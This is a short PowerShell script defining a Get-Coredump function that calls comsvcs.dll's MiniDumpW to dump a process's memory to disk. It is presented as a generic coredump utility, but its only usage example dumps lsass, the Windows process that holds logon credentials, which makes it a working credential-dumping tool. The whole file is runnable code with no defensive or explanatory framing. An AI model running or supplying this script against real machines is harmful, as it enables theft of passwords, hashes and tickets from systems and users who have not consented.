Get-Coredump.ps1

function Get-Coredump
{

<#
.SYNOPSIS
    Uses COM services to generate a coredump of a running process

.DESCRIPTION
    Uses COM services to generate a coredump of a running process

.EXAMPLE
    C:\> $lsass = Get-Process -Name lsass
    C:\> Get-Coredump -ProcId $lsass.Id -DumpPath c:\dumps\lsass.dmp

#>

    param(
        [Parameter(Mandatory = $True)]
        [String]$DumpPath,
        [Parameter(Mandatory = $False)]
        [ValidateSet("full", "mini")]
        [String]$DumpType = "full",
        [Parameter(Mandatory = $True)]
        [int]$ProcID
    )


	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	public static class ComSvcs
	{
		[DllImport("comsvcs.dll", SetLastError=true, CharSet=CharSet.Unicode)]
		public static extern bool MiniDumpW(
            IntPtr Dummy1,
            IntPtr Dummy2,
			string lpArg
        );
    }

    public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	}
"@



    $lpArg = "{0:d} {1:s} {2:s}" -f $ProcID, $DumpPath, $DumpType


    Write-Output "[*] calling comsvcs!MiniDumpW..."

    if( [ComSvcs]::MiniDumpW(0,0,$lpArg) )
    {
        Write-Output "[+] Success, process PID=$($ProcID) dumped as '$($DumpPath)'"
    }
    else
    {
        Write-Error "[-] Failed to dump process:  $((New-Object System.ComponentModel.Win32Exception([int][Kernel32]::GetLastError())).Message)"
    }
}